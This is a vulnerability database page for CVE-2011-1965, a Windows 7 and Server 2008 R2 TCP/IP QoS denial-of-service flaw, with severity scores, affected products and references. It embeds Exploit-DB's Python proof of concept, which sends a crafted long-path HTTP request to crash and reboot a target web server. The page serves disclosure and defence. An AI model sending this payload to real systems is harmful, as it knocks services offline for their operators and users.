CVE-2011-1965 : Detail

CVE-2011-1965

89.92%V3
Network
2011-08-10
19h16 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.1 AV:N/AC:M/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17981

Publication date : 2011-10-14 22h00 +00:00
Author : Byoungyoung Lee
EDB Verified : No

# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could Allow Denial of Service # Date: 10/12/2011 # Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/ # Version: Windows 7 32bit, fully patched until Aug 2011 # Tested on: Windows 7 32bit # CVE : CVE-2011-1965 # analysis is available - http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/ ------------------------------------------------------------------------------------------------------ # Byoungyoung Lee, http://twitter.com/mylifeasageek import struct import socket HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:) PORT= 80 def tryOnce(i,j): print hex(i), hex(j) filename = ["a"*0x100 for x in range(i)] filename = "/".join(filename) filename += "/" + "b" * j print "filename len : ", hex(len(filename)) hostname = "www.darungrim.org" header = "GET /%s\n" % filename header += "HOST: %s\n\n\n" % hostname s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST,PORT)) s.send(header) response = s.recv(1024) s.close() print response return if __name__ == '__main__': tryOnce(0x3c,0x7)

Products Mentioned

Configuraton 0

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_server_2008 >> Version r2

References

http://securityreason.com/securityalert/8474
Tags : third-party-advisory, x_refsource_SREASON
http://www.us-cert.gov/cas/techalerts/TA11-221A.html
Tags : third-party-advisory, x_refsource_CERT